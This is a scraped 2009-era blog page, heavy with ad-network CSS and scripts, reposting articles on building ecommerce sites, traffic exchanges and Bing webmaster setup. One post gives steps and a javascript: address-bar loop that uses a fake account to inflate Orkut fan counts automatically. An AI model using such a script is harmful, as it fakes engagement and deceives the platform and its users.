.konaLayers .konaSearch_Form input { font: normal 11px verdana; color: black; border: 1px solid #7F9DB9; margin-right: 3px;padding-left:2px; }
.konaLayers .konaSearch_Form .konaSearchName { font: normal 11px verdana; color: #96BF00; padding-right: 6px; }
.konaLayers .konaLayer .konaBox02 td.konaHover * { color: #96BF00; }
.searchTbContainer { width:295px; height:20px; border:0px solid red; padding:0 0 0 0; margin: 0 0 0 0; }
.searchTransTb { width:10px; height:20px; border:0px solid blue; margin:0; padding: 0; vertical-align:middle; }
.searchLogoTb { width:81px; height:20px ;vertical-align:middle;border:0px solid red; margin:0; padding: 0; }
.searchInputTb { width:140px; height:20px; vertical-align:middle; margin:0; padding: 0; }
.searchButtonTb { width:63px; height:20px; vertical-align:middle;border:0px solid red; margin:0; padding: 0; }
.searchInputFieldTbDiv { width:133px; height:16px; position:relative; background-color: #fff; border:1px solid #939aa0; padding-left: 2px; margin:0; vertical-align:middle; }
.searchInputFieldTb { font-size:12px; font-weight: normal; font-family:Tahoma, Arial, sans-serif; color:#000000;background-color: transparent;position:absolute; }
.konaYahooSponsored_bckgr { background:url(http://kona.kontera.com/javascript/lib/imgs/konaYSponsored_fon_w_text.gif); height:113px; width:300px; margin-left:7px; margin-top:3px }
.konaYahooSponsored_table { margin-top: 72px; margin-left: 17px; }
.konaYahooSponsored_input { width: 182px; font: Verdana, Arial, Helvetica, sans-serif; margin-top: 0px; background-color:#FFF;color: black;border:1px inset #ccc; padding: 1px 0px; }
.konaYahooSponsored_inputContainor { position:relative; width: 182px; text-align: left; overflow: hidden; }
.konaYahooSponsored_td { padding:2px; }
</style><span id="konasapn0"><script src="http://kona5.kontera.com/KonaGet.js?u=1255767010307&p=8724&k=http%3A//hackernepal.blogspot.com/2009/10/how-to-build-high-ranking-ecommerce.htmlMOZILLA&al=1&l=http%3A//hackernepal.blogspot.com/2009/10/how-to-build-high-ranking-ecommerce.html&t=hacker+nepal+%3A+How+To+Build+A+High+Ranking+Ecommerce+Website+That+Sells+%21&m2=+function+setAttributeOnload%28object+%2C+attribute+%2C+val+%29+%7B+if%28window.addEventListener+%29+%7B+&rId=8724_1255767010307_06166967757498376&prev_page=http%3A//hackernepal.blogspot.com/&rl=0&1=14&mod=201326850&rm=1&dc_aff_id=&add=FlashVer_Shockwave%20Flash%2010.0%20r12%7Cuser_%7Csession_" type="text/javascript">
</script> <script language="JavaScript" src="http://konax.kontera.com/publisher_tail/generatedPublisherConfig.js?publisher_id=8724">
</script><script language="JavaScript" src="http://kona.kontera.com/javascript/lib/KonaBase.js?00000000416">
</script><style id="konaStyle" type="text/css">
span.kLink { border-top: 0px none !important;border-left: 0px none !important;border-right: 0px none !important;border-bottom: 1px solid ;padding : 0px 0px 1px 0px !important;color:blue;background: transparent none;width: auto !important;float: none !important;display:inline !important; }
a.kLink { color:blue !important ; border-bottom-style: none;text-decoration: underline;cursor: pointer;font-family: verdana;border: 0px none transparent !important;background: transparent none !important;margin: 0px 0px 0px 0px; padding:0px 0px 0px 0px !important;text-transform: none !important;display:inline !important;font-variant:normal;top:0px; right:0px;bottom:0px;left:0px; }
a.kLink:link { color:blue !important ; border-bottom-style: none;text-decoration: underline;cursor: pointer;font-family: verdana;border: 0px none transparent !important;background: transparent none !important;margin: 0px 0px 0px 0px; padding:0px 0px 0px 0px !important;text-transform: none !important;display:inline !important;font-variant:normal;top:0px; right:0px;bottom:0px;left:0px; }
a.kLink:hover { color:blue;text-decoration: underline;cursor: pointer;font-family: verdana;border: 0px none transparent !important;background: transparent none !important;margin: 0px 0px 0px 0px; padding:0px 0px 0px 0px !important;text-transform: none !important;display:inline !important;font-variant:normal;top:0px; right:0px;bottom:0px;left:0px; }
a.kLink:visited { color:blue;text-decoration: underline;cursor: pointer; font-family: verdana;margin: 0px 0px 0px 0px; padding:0px 0px 0px 0px; }
.sponsor { font-family: MS Sans Serif, Verdana; color: #AFAFAF;font-size: 9pt; cursor: default; }
.konaLayers { azimuth:center;border-collapse:separate;border-spacing:0;caption-side:top;cursor:auto;direction:ltr;elevation:level;empty-cells:show;font-size:medium;font-style:normal;font-variant:normal;font-weight:normal;line-height:normal;list-style-image:none;list-style-position:outside;list-style-type:disc;orphans:2;page-break-inside:auto;pitch-range:50;pitch:medium;position:static;richness:50;right:auto;speak-header:once;speak-numeral:continuous;speak:normal;speech-rate:medium;stress:50;text-align:left;text-indent:0;text-transform:none;visibility:visible;volume:medium;white-space:normal;widows:2;word-spacing:normal; }
.konaLayers * { background-attachment:scroll;background-color:transparent;background-image:none;background-position:0% 0%;background-repeat:repeat;border-style: none none none none;border-width: medium medium medium medium;clear:none;color:inherit;content:normal;counter-increment:none;counter-reset:none;cue-after:none;cue-before:none;float:none;left:auto;letter-spacing:normal;margin: 0px 0px 0px 0px;max-height:none;max-width:none;min-height:0;min-width:0;outline-color:invert;outline-style:none;outline-width:medium;overflow:visible;padding:0px 0px 0px 0px;page-break-after:auto;page-break-before:auto;pause-after:0;pause-before:0;position:static;table-layout:auto;text-decoration:none;top:auto;unicode-bidi:normal;width:auto;z-index:auto; }
.konaLayers .konaLayer { position: absolute; top:0px; left:0px; width: 313px; padding: 0px; visibility: hidden; text-align:left; overflow: hidden; }
.konaLayers .konaLayer a { font-weight: normal;text-decoration:none;border: 0px none transparent !important;background: transparent none !important;margin: 0px 0px 0px 0px; padding:0px 0px 0px 0px !important;text-transform: none !important;display:inline !important;font-variant:normal;top:0px; right:0px;bottom:0px;left:0px; }
.konaLayers .konaLayer a:link { font-weight: normal;text-decoration:none;border: 0px none transparent !important;background: transparent none !important;margin: 0px 0px 0px 0px; padding:0px 0px 0px 0px !important;text-transform: none !important;display:inline !important;font-variant:normal;top:0px; right:0px;bottom:0px;left:0px; }
.konaLayers .konaLayer a:hover { font-weight: normal;text-decoration:none;border: 0px none transparent !important;background: transparent none !important;margin: 0px 0px 0px 0px; padding:0px 0px 0px 0px !important;text-transform: none !important;display:inline !important;font-variant:normal;top:0px; right:0px;bottom:0px;left:0px; }
.konaLayers .konaLayer b { font-size:inherit; }
a.CBL { cursor:default; }
a.CBL:link { cursor:default; }
a.CBL:hover { cursor:default; }
a.CBL:visited { cursor:default; }
.konaLayers .CBL .handleTd div { cursor:default; }
.konaLayers .konaPlate { cursor : pointer; }
.konaLayers .konaPlate .konaBox { background: url(http://kona.kontera.com/javascript/lib/imgs/top_box.gif) left top no-repeat;width: 313px; }
.konaLayers .konaPlate .konaBottomBox { width: 313px; height:45px; font-size: 3px; background: url(http://kona.kontera.com/javascript/lib/imgs/box_bottom.png) left top no-repeat; }
.konaLayers .konaPlate .konaBottomBox_Right { width: 313px; height:45px; font-size: 3px; background: url(http://kona.kontera.com/javascript/lib/imgs/box_bottom_right.png) left top no-repeat; }
.konaLayers .konaPlate .konaBottomBox_drag { width: 313px; height:20px; font-size: 3px; background: url(http://kona.kontera.com/javascript/lib/imgs/box_bottom_drag.png) top no-repeat; }
.konaLayers .handleTd { vertical-align: top; width: 180px; }
.konaLayers .handleTd div { cursor: move; padding: 0px 0px 0px 33px; font-size: 3px; }
.konaLayers .handleTd img { }
.konaLayers .frameBarCell_left { width:88px; vertical-align: top; padding: 0px 0px 0px 0px; }
.konaLayers .frameBarCell_right { width: 32px; vertical-align: top; padding-top: 0px; font-size: 5px; }
.konaLayers .frameBar { margin-left: 7px; margin-right: 6px; cursor:auto; width:300px; }
.konaLayers .konaDescDiv { cursor: pointer; padding-top: 2px; }
.konaLayers .table02 { margin-left: 9px; font: normal 13px arial; width: 305px; }
.konaLayers .table03 { margin-left: 8px; font: normal 13px arial; width: 280px; table-layout: fixed; }
.konaLayers .table03_flv02 { margin: 0px 0px 0px 32px; width: 242px; font: normal 13px arial; table-layout: fixed; }
.konaLayers .konaLayerTitle { text-align:center; padding-right: 10px; }
.konaLayers .konaLayerRMTitle { text-align:left; padding-right: 10px; padding-left: 6px; }
.konaLayers .konaLayerTitleText { font: bold 11px tahoma; color:#FFA200;; !important; text-decoration: underline;display:block; }
.konaLayers .konaLayerTitleText b { font-size : 11px; color: #FFA200; }
.konaLayers .konaLayerDesc { padding: 6px 7px 0px 0px; font: normal 11px verdana !important; color: BLACK; text-align: left; }
.konaLayers .konaLayerDescDownlod { padding: 6px 7px 0px 0px; vertical-align:top; font: normal 11px verdana !important; color: BLACK; text-align: left; }
.konaLayers .konaLayerDesc b { font-size : 11px; color: BLACK; }
.konaLayers .konaLayerLinks td { padding-top: 8px; }
.konaLayers .konaLayerShopLinks td { padding-top: 1px; font-size: 9px; }
.konaLayers .site { padding-left: 8px; overflow:hidden; }
.konaLayers .site a { color: #666666 !important; font: normal 11px arial !important; text-decoration: underline !important; overflow:hidden; }
.konaLayers .site a:hover { color: #FFA200 !important; }
.konaLayers .buyNow { text-align: right; width:105px; }
.konaLayers .konaLayer img { border: 0px;display:inline; padding:0px; }
.konaLayers .imgBanner { padding: 6px 13px 0px 6px; vertical-align: top; width:51px; text-align: center;padding-bottom: 4px; }
.konaLayers .imgShoppingBanner { padding: 5px 4px 0px 3px; vertical-align: top; width: 51px; text-align: center; }
.konaLayers .imgBanner_down { padding: 5px 13px 0px 13px; vertical-align: top; width:51px; text-align: center; }
.konaLayers .top_curve { width: 313px; height: 10px; padding:0px; margin:0px;background: url(http://kona.kontera.com/javascript/lib/imgs/top_curve.png) left top no-repeat; }
.konaLayers .drop_top_curve { width: 313px; height: 35px;font-size: 3px;background: url(http://kona.kontera.com/javascript/lib/imgs/drop_top_curve.png) top no-repeat; }
.konaLayers .drop_top_curve_right { width: 313px; height: 35px; font-size: 3px;background: url(http://kona.kontera.com/javascript/lib/imgs/drop_top_curve_right.png) top no-repeat; }
.konaLayers .konaSearchRow td { padding-top: 2px; }
.konaLayers .konaSearchTable { margin-left: 5px; font: normal 13px arial; }
.KonaBody { display:inline; }
.konaLayers .table02_flv { margin-left: 10px; margin-top: 3px; margin-bottom: -4px; }
.konaLayers .table02_flv02 { margin-left: 34px; width: 234px; margin-top: 3px; }
.konaLayers .table02_flv03 { margin-left: 6px;margin-top: 3px; }
.konaLayers .konaLayer_flvTD01 { padding: 6px 6px 0px 6px; }
.konaLayers .konaLayer_flvTD02 { padding: 5px 6px 0px 6px; }
.konaLayers .konaLayer_flvEmbed01 { }
.konaLayers .konaLayer_flvEmbed02 { margin-bottom: -3px; }
.konaLayers .konaLayerDesc_nearFLV { font: normal 11px verdana !important; color: BLACK; text-align: left;vertical-align: top; padding: 11px 10px 0px 0px; }
.konaLayers .konaLayerDesc_underFLV { font: normal 11px verdana !important; color: BLACK; text-align: left;font: normal 11px/14px verdana !important; vertical-align: top; padding: 4px 0px 0px 6px; }
.konaLayers .konaLayerLearnMore { text-align:left; vertical-align: bottom; padding: 0px 0px 1px 6px; }
.konaLayers .konaLayerLearnMore02 { vertical-align: top; text-align:right;width: auto !important; padding: 4px 0px 0px 0px !important; }
.konaLayers .konaLayerDownload { vertical-align: top; text-align:right;width: 132px !important; padding: 4px 0px 0px 0px !important; }
.konaLayers .konaLayerLinks_underFLV td { padding-top: 4px; padding-bottom: 4px; line-height: 14px; }
.konaLayers .konaLayerLinks_underFLV02 td { padding-top: 4px; line-height: 14px; }
.konaLayers .konaFlashWrap { width: 320px; height: 288px; }
.konaLayers .konaFlashDrag { position:absolute;width:198px;height:26px;background-color:#ffffff;opacity:0;filter:alpha(opacity=0);cursor:move; }
.konaLayers .konaFlashContent { width: 320px; height: 288px; }
.konaLayers #konaFlashBubble { width: 320px; height: 288px; }
.konaLayers .konaBigFlashWrap { position:absolute;width:470px;height:395px; }
.konaLayers .konaBigFlashDrag { position:absolute;z-index:17;width:347px;height:24px;left:85px;top:5px;background-color:#ffffff;opacity:0;filter:alpha(opacity=0);cursor:move; }
.konaLayers .konaBigFlashContent { position:absolute;left:0;top:0;z-index:12;width:470px;height:395px; }
.konaLayers .konaInfocomSearchTD .konaLineInputTD { position:relative; }
.konaInfocomTableContainer { margin-left:21px; }
.konaInfocomSearchTD { background: url(http://kona.kontera.com/javascript/lib/imgs/konaInfocom_search_area_trans.gif); width: 270px; height:46px; }
.konaInfocomSearchTable { margin-top: 10px; margin-left:13px; width:244px; }
.konaInfocomSearchField { width:163px; font-family:Verdana, Arial, Helvetica, sans-serif; font-size:12px; background-color:#FFF;color:#000; border:1px inset #ccc; padding: 1px 0px; }
.konaInfocomInputContainer { position:relative; width: 163px; text-align: left; overflow: hidden; }
.konaLayers .konaFlashWrap { position:relative; }
.konaLayers .konaExpandFlashWrap { position:relative; }
.konaLayers .konaFlashDrag { z-index:100;position:absolute;width:198px;height:26px;background-color:#ffffff;opacity:0;filter:alpha(opacity=0.0);cursor:move;top:0px; }
.konaLayers .konaExpandFlashContent { }
.konaLayers .konaExpandFlashIframe { /*background:yellow;*/z-index:9999;position:absolute; }
.konaLayers .konaWebnaryGradientTD .konaLineInputTD { position:relative; width: 200px }
.konaWebnaryGradientTD { background:url(http://kona.kontera.com/javascript/lib/imgs/konaWebnaryGrad.gif) repeat-x; height:39px; width:300px; }
.konaWebnaryTable { width: 300px; height:112px; margin-left:7px; margin-top:3px }
.konaWebnaryHeadTD { width: 300px; height:51px; }
.konaWebnarySubTD { width: 300px; height:22px; }
.konaWebnarySearch { width:280px; height:23px; margin: 3px 0 0 10px; }
.konaWebnaryInput { width: 200px; font: 12px Verdana, Arial, Helvetica, sans-serif; background-color:#FFF;color: black; border:1px inset #ccc; padding: 1px 0px; }
.konaWebnarySubmit { margin-left:5px; }
.konaWebnaryInputContainer { position:relative; width: 200px; text-align: left; overflow: hidden; }
.konaLayers .konaFDGradientTD .konaLineInputTD { position:relative; width: 193px }
.konaFDGradientTD { background:url(http://kona.kontera.com/javascript/lib/imgs/konaFDbottom.gif); height:39px; width:300px; }
.konaFDTable { width: 300px; height:112px; }
.konaFDHeadTD { width: 300px; height:55px; }
.konaFDSubTD { width: 300px; height:20px; }
.konaFDSearch { width:280px; height:23px; margin: 3px 0 0 10px; }
.konaFDInput { width: 193px; font: 12px Verdana, Arial, Helvetica, sans-serif; background-color:#FFF;color: black;border:1px inset #ccc; padding: 1px 0px; }
.konaFDSubmit { margin-left:5px; }
.konaFDInputContainer { position:relative; width: 193px; text-align: left; overflow: hidden; }
.konaYahooShoppingTable { width: 288px; height:125px; border: none; margin-left: 12px; margin-top: 5px; background-image:url(http://kona.kontera.com/javascript/lib/imgs/konaYahooSbgWhite.gif); }
.konaYahooShoppingTable2 { width: 288px; border: none; margin-left: 12px; }
.konaYahooShoppingHeader { height: 31px; font-family:Verdana, Arial, Helvetica, sans-serif; padding-bottom: 0px; vertical-align:middle; text-align:center; }
.konaLayers .konaLayer a.konaYahooShoppingTitle { font-size:11px; font-weight:bold; color: #000000; text-decoration:underline; cursor:default; }
.konaYahooShoppingContentTable { border: none; padding:0; }
.konaYahooShoppingImageTd { padding-top:6px; padding-right:0px; padding-left:12px; padding-bottom:0px; vertical-align:top; }
.konaLayers .konaLayer .konaYahooShoppingImg { border:solid 1px; border-color: #808080; }
.konaYahooShoppingPrice { padding-bottom:5px; padding-right: 7px; }
.konrYahooShoppingFont { font-family:Verdana, Arial, Helvetica, sans-serif; font-size:11px; color: #000000; }
.konaYahooShoppingText { width: 177px; padding-left: 5px }
.konaYahooShoppingDescriptionTable { height: 80px; }
.konaYahooShoppingDescriptionTd { vertical-align: top; }
.konaYahooShoppingDescription { margin:0; padding: 3px 3px 7px 2px; text-align:left; vertical-align:top; line-height:1.5; }
.konaYahooSecondTable { background-image:url(http://kona.kontera.com/javascript/lib/imgs/konaYahooSbgMiddle2.gif); width:100%; border: none; }
.konaYahooSecondTableLinkTD { padding-left:15px; vertical-align:bottom; }
.konaLayers .konaLayer a.konrYahooLink1 { color:#0170b3; font-size:10px; text-decoration: underline; font-family: verdana,sans-serif; }
.konaYahooSecondTableButtonTD { float:right; vertical-align:bottom; }
.konaYahooShoppingBuyNowImg { margin-right: 5px; float:right; border:none; }
.konaYahooShoppingBottomTd { padding:0px; vertical-align:top; }
.konaYahooShoppingBottomImg { padding:0; margin:0; }
.konaYahooShoppingPoweredImg { margin:5px 0 0 0; padding:0; }
.konaLayers .konaBox_bottom { background: url(http://kona.kontera.com/javascript/lib/imgs/box_separator.gif) left top no-repeat; width: 313px; height: 10px; font-size: 1px; }
.konaLayers .konaBox02 { background: url(http://kona.kontera.com/javascript/lib/imgs/box.gif) left top no-repeat; width: 313px; padding-top: 7px; }
.konaLayers .konaLayer .konatabs_Search { margin: 0px 0px 0px 16px; width: 280px; padding: 0px; text-align: left; background: url(http://kona.kontera.com/javascript/lib/imgs/tabs_bg.gif) bottom repeat-x; }
.konaLayers .konaLayer .konatabs_Table td { padding-right: 4px; }
.konaLayers .konaLayer .konatabs_Table div { height: 18px; padding: 0px ; text-align: center; background: url(http://kona.kontera.com/javascript/lib/imgs/tab_right.gif) bottom right no-repeat; }
.konaLayers .konatabs_Table div span { display:block; height: 15px; padding: 3px 7px 0px 9px; text-align: center; background: url(http://kona.kontera.com/javascript/lib/imgs/tab_left.gif) bottom left no-repeat; color: #808080; font: normal 11px arial; cursor: pointer; }
.konaLayers .konaLayer .konatabs_Table div.selected { background: url(http://kona.kontera.com/javascript/lib/imgs/tab_selected_right.gif) bottom right no-repeat; cursor: default; }
.konaLayers .konatabs_Table div.selected span { background: url(http://kona.kontera.com/javascript/lib/imgs/tab_selected_left.gif) bottom left no-repeat; font: bold 11px arial; color: #96BF00; cursor: default; }
.konaLayers .konaSearch_Form { margin: 6px 0px 0px 15px; }
.konaLayers .konaSearch_Form input { font: normal 11px verdana; color: black; border: 1px solid #7F9DB9; margin-right: 3px;padding-left:2px; }
.konaLayers .konaSearch_Form .konaSearchName { font: normal 11px verdana; color: #96BF00; padding-right: 6px; }
.konaLayers .konaLayer .konaBox02 td.konaHover * { color: #96BF00; }
.searchTbContainer { width:295px; height:20px; border:0px solid red; padding:0 0 0 0; margin: 0 0 0 0; }
.searchTransTb { width:10px; height:20px; border:0px solid blue; margin:0; padding: 0; vertical-align:middle; }
.searchLogoTb { width:81px; height:20px ;vertical-align:middle;border:0px solid red; margin:0; padding: 0; }
.searchInputTb { width:140px; height:20px; vertical-align:middle; margin:0; padding: 0; }
.searchButtonTb { width:63px; height:20px; vertical-align:middle;border:0px solid red; margin:0; padding: 0; }
.searchInputFieldTbDiv { width:133px; height:16px; position:relative; background-color: #fff; border:1px solid #939aa0; padding-left: 2px; margin:0; vertical-align:middle; }
.searchInputFieldTb { font-size:12px; font-weight: normal; font-family:Tahoma, Arial, sans-serif; color:#000000;background-color: transparent;position:absolute; }
.konaYahooSponsored_bckgr { background:url(http://kona.kontera.com/javascript/lib/imgs/konaYSponsored_fon_w_text.gif); height:113px; width:300px; margin-left:7px; margin-top:3px }
.konaYahooSponsored_table { margin-top: 72px; margin-left: 17px; }
.konaYahooSponsored_input { width: 182px; font: Verdana, Arial, Helvetica, sans-serif; margin-top: 0px; background-color:#FFF;color: black;border:1px inset #ccc; padding: 1px 0px; }
.konaYahooSponsored_inputContainor { position:relative; width: 182px; text-align: left; overflow: hidden; }
.konaYahooSponsored_td { padding:2px; }
</style><span id="konasapn0"><script src="http://kona5.kontera.com/KonaGet.js?u=1255754281453&p=8724&k=http%3A//www.article99.com/2008/09/21/how-to-build-a-high-ranking-ecommerce-website-that-sells-25343.htmlMOZILLA&al=1&l=http%3A//www.article99.com/2008/09/21/how-to-build-a-high-ranking-ecommerce-website-that-sells-25343.html&t=How+To+Build+A+High+Ranking+Ecommerce+Website+That+Sells+%21+-+Arindam+Chattopdhyay&m1=ecommerce+%2C+website+%2C+build+%2C+visitors+%2C+customers+%2C+design+%2C+business+%2C+services+%2C+&rId=8724_1255754281453_07270570096766342&prev_page=http%3A//www.article99.com/directory/&rl=0&1=14&mod=134217986&rm=1&dc_aff_id=&add=FlashVer_Shockwave%20Flash%2010.0%20r12%7Cuser_%7Csession_" type="text/javascript">
</script> </span></span><br />
<div class="KonaBody"><div class="para"><span id="konasapn0"><span id="konasapn0">To build an ecommerce web site yourself is really not such a difficult task when using the right kind of tools. You will want to build an ecommerce website using the latest technologies such as a user-friendly shopping cart, integrations with top auction sites as well as a payment gateway.</span></span><br />
<span id="konasapn0"><span id="konasapn0">To build an ecommerce web site yourself is really not such a difficult task when using the right kind of tools. You will want to build an ecommerce website using the latest technologies such as a user-friendly shopping cart, integrations with top auction sites as well as a payment gateway. Although the web site design is important, correct usage of the ecommerce marketing tools will result in many business transactions.</span></span><br />
<span id="konasapn0"><span id="konasapn0"><br />
</span></span><br />
<span id="konasapn0"><span id="konasapn0">Here are some points to consider when getting down to building an ecommerce website.</span></span><br />
<span id="konasapn0"><span id="konasapn0">a) Its design should facilitate easy buying of goods and services </span></span><br />
<span id="konasapn0"><span id="konasapn0">b) Your products or services should be of value to the customers</span></span><br />
<span id="konasapn0"><span id="konasapn0">c) Offer personal attention to all customers </span></span><br />
<span id="konasapn0"><span id="konasapn0">d) Offer discounts and e-mail promotions to them so that they keep returning to your site</span></span><br />
<span id="konasapn0"><span id="konasapn0"><br />
</span></span><br />
<span id="konasapn0"><span id="konasapn0">The design of your web site should mirror your business and what you want to market. The website is your interface with your customers and through it you must be able to convince them to buy your product. At the same time it should not be aggressive towards sales and scare off the visitors.</span></span><br />
<span id="konasapn0"><span id="konasapn0"><br />
</span></span><br />
<span id="konasapn0"><span id="konasapn0">When you build an ecommerce website you need to use as many keywords (the words through which the search engines bring visitors to your online store) as possible to ensure that the search engines list your store higher when the visitors are looking for the items you sell.</span></span><br />
<span id="konasapn0"><span id="konasapn0"><br />
</span></span><br />
<span id="konasapn0"><span id="konasapn0">With more than hundred different internet browsers currently available you need to ensure that your site is compatible to be picked up by all of them. Build an ecommerce website that is viewed in at least Internet Explorer 4.0+ and Netscape 4.0+. This is helpful in getting traffic to your site.</span></span><br />
<span id="konasapn0"><span id="konasapn0"><br />
</span></span><br />
<span id="konasapn0"><span id="konasapn0">The images used on your site should detail your merchandise clearly. Also be sure to optimize your images for </span></span><br />
<span id="konasapn0"><span id="konasapn0">fast download; one loses a lot of customers who can�t wait endlessly for the pictures to show up.</span></span><br />
<span id="konasapn0"><span id="konasapn0"><br />
</span></span><br />
<span id="konasapn0"><span id="konasapn0">Site navigation should be easy to understand and use. Answer any and all questions you think visitors may have in the FAQ section. Buyers hate to meander on a site if it leads nowhere, so the easier your site navigation the more sales you will have.</span></span><br />
<span id="konasapn0"><span id="konasapn0">Build an ecommerce website specially designed for your business in a cost effective way to promote your products or services.</span></span><br />
</div><div class="para"><br />
</div><div class="para"><div id="menu"><div class="menu1 section" id="menu1"></div></div><div id="crosscol-wrapper"></div><span id="konasapn0"><span id="konasapn0"><a href="http://www.blogger.com/post-edit.g?blogID=2254663475743620910&postID=3534310810087545229" name="8291267367604647526"></a> </span></span><br />
<div class="post_title" style="color: #990000;"><h2><span id="konasapn0"><span id="konasapn0"> Website Traffic </span></span></h2></div><div class="post_date"><span id="konasapn0"><span id="konasapn0"> 9:30 PM | By hang </span></span><br />
</div><span id="konasapn0"><span id="konasapn0"><span style="font-size: small;">If you’re an online marketer and own a website, you know the key to making sales is getting more traffic to your website. You also know all web site traffic is not created equal. You not only need lots of web traffic, you need lots of targeted traffic. That’s the key and once you have it, your sales will increase exponentially. The best way to get targeted website traffic is to use Pay-per-Click (PPC) services such as Google AdWords, or Yahoo or a host of other pay services. You also need to know what you’re doing or you could find yourself spending lots of money, getting poor results and losing money very quickly. Also, when you’re first starting out, you have a limited budget, and starting with PPC campaigns may not even be an option for you at this point in time. <br />
That’s where free traffic exchanges come in. Free traffic exchanges can be a great way to get traffic to your website. You should also know there’s really no such thing as free because you must spend your time surfing through other websites to earn credits. Free traffic exchanges are a great way to get lots of visitors to your site however, so spending an hour a day surfing, is not a lot to ask if you’re making sales from your efforts. And isn’t this why your in this business to begin with? <br />
Free traffic exchanges are a great marketing tool for a many reasons. The best reason is that you get lots of people looking, and hopefully clicking on your website or promotional pages. But there are hidden benefits to free traffic exchanges you may not have even considered. <br />
Search engines love free traffic exchanges because of all the incoming and outgoing links they generate. Plus the rapidly changing content is another reason the search engines love traffic exchanges. Exchanges that have more content also generate a higher page rank, and therefore more traffic, and increased memberships. The key is to find exchanges that are very active and have lots of members. The more members they have, the more potential customers you get looking at your offer and your chances for sales conversions are that much better. But bigger isn’t always better. <br />
Some free traffic exchanges may do very well for one marketer, and be a complete waste of time for another. If everyone were promoting the same website or affiliate program in the same traffic exchange for example, then chances are you would not make many sales. Even if you were promoting the best product or service on the internet, if everyone promoted the same thing, your chances of someone purchasing through your website or links, are slim to none. Also, when people see the same ad over and over again, they get desensitized to it. Don't fall into this trap. It's one thing to try and sell a very popular product/service/ebook etc, but it's another thing when a million other people are trying to do it too. Competition is a good thing, because it validates your market, but too much competition is tough and it's time to move on to something else. <br />
We all know clicking on ads in a free traffic exchange can be very boring, monotonous and can take a lot of time. That's why you need to make the best of your opportunity or you will just be wasting a lot of your time and effort on something that just isn't working. If you have your own niche website, then you already differentiated yourself from the pack. If you are an affiliate marketer, then you need to find products/services that everyone else isn't promoting, especially within that particular traffic exchange. <br />
One way to use free traffic exchanges to your advantage is to join a few at first, and see if your sales pick up. If your sales aren’t doing well, then test out a few more. When you do find a few traffic exchanges that appear to be generating sales for you, then narrow those down until you find the one, or two that are working. Now concentrate your efforts on those because they’re the ones you want. At least for now anyway. Things may change, so keep an eye on your campaigns and if sales seem to be falling off, then it might be time to change </span>.</span></span><br />
</div><div class="para"><span id="konasapn0"><span id="konasapn0"><br />
</span></span><br />
</div><div class="para"><span id="konasapn0"><span id="konasapn0"><br />
</span></span><br />
</div><div class="para" style="color: #990000;"><h2><span id="konasapn0"><span id="konasapn0">Increase Fans ( Working Code ) Really A<span style="background-color: white;"></span>mazing </span></span></h2></div><div class="para"><div id="menu"><div class="menu1 section" id="menu1"></div></div><div id="crosscol-wrapper"></div><span id="konasapn0"><span id="konasapn0"><a href="http://www.blogger.com/post-edit.g?blogID=2254663475743620910&postID=3534310810087545229" name="6841790918501406047"></a> </span></span><br />
<div class="post_title" style="background-color: blue;"><h2><span id="konasapn0"><span id="konasapn0"></span></span><span id="konasapn0"><span id="konasapn0"> </span></span></h2></div><h3 class="post-title"></h3><span id="konasapn0"><span id="konasapn0"><b><b>Follow the steps:</b><br />
<br />
<b>1) Create a fake account or simply login with ur friends Id.. and add yourself as a friend there.</b><br />
<br />
<b>2) Visit the FRIENDS page by logging into your just created fake account or the Friends account.</b><br />
<br />
<b>3) Point your cursor on the fan icon () beside your real profile. Note your status bar. It should be showing something like javascript:setKarma('FRUS*******/US*******'). Note the code FRUS******* and US******* somewhere. Now, click on the star so as to make your fake account a fan of your real account.</b><br />
<br />
<b>4) Copy the following code to your address bar (The location where you type </b><a class="external" href="http://www.orkut.com/" rel="nofollow" target="_blank"><b>http://www.orkut.com</b></a><b> ). Replace FRUS******* and US******* in the following script with the one you noted in the above step.<br />
</b></b></span></span><br />
<span id="konasapn0"><span id="konasapn0">javascript:function cmd(){window.location="/setkarma?cat=0&val=3&gid=FRUS*******/US*******";}void(setInterval(cmd,2000));<b><br />
<br />
5) Hit ENTER key of your keyboard. The page will keep on reloading and your fans will keep on increasing with an approximate speed of 6 fans per second untl you close the window.</b></span></span><br />
</div><div class="para"><br />
</div><div class="para"><br />
</div><div class="para"><h3 class="post-title entry-title"><span id="konasapn0"><span id="konasapn0"><a href="http://www.forehacking.co.cc/2009/08/increase-blog-traffic-using-bing.html">4. Increase blog traffic using Bing !<br />
</a> </span></span></h3><span id="konasapn0"><span id="konasapn0"><span style="color: blue;">Bing</span> is the new and powerful <b style="background-color: #ffff66;">Search</b> <b style="background-color: #a0ffff;">engine</b> by <u>Microsoft</u> which replaced <span style="color: red;"><a href="javascript:void(0);" onclick="_linkInterstitial('http://live.com/'); return false;" target="_blank">Live.com</a></span>. Bing is a strong competition to <span style="color: blue;">Google</span> and it has already left Yahoo <b style="background-color: #ffff66;">search</b> behind. If you are a site owner, then you must add your site to Bing to get high traffic. Bing is already having a huge database but by following these simple steps, you can improve your site’s visibility in <b style="background-color: #ffff66;">search</b> results.</span></span><br />
<span id="konasapn0"><span id="konasapn0"><br />
</span></span><br />
<span id="konasapn0"><span id="konasapn0">1) Go to <a href="javascript:void(0);" onclick="_linkInterstitial('http://www.bing.com/webmaster/'); return false;" target="_blank">Bing Webmaster’s</a> page and Sign with your <u>Windows live ID</u>.</span></span><br />
<span id="konasapn0"><span id="konasapn0"><br />
</span></span><br />
<span id="konasapn0"><span id="konasapn0">2) Click on <span style="color: red;">‘Add a site’</span> button and enter your Blog/Site address, sitemap address and submit.</span></span><br />
<span id="konasapn0"><span id="konasapn0"><br />
</span></span><br />
<span id="konasapn0"><span id="konasapn0">3) It will open a new page asking for verification, you can do that by uploading a xml file to root folder of your site or inserting a <*meta*> tag to your Blog’s Head section.</span></span><br />
<span id="konasapn0"><span id="konasapn0"><br />
</span></span><br />
<span id="konasapn0"><span id="konasapn0">4) Wait for few days, Bing will then stat crawling your Blog’s pages, helping you to rank higher in <b style="background-color: #ffff66;">search</b> results. <b></b></span></span><br />
</div><div class="para"><span id="konasapn0"><span id="konasapn0"><b><br />
</b></span></span><br />
</div><div class="para"><span id="konasapn0"><span id="konasapn0"><b><br />
</b></span></span><br />
</div><div class="para"><div id="menu"><div class="menu1 section" id="menu1"></div></div><div id="crosscol-wrapper"></div><span id="konasapn0"><span id="konasapn0"><a href="http://www.blogger.com/post-edit.g?blogID=2254663475743620910&postID=3534310810087545229" name="6789469710872943862"></a> </span></span><br />
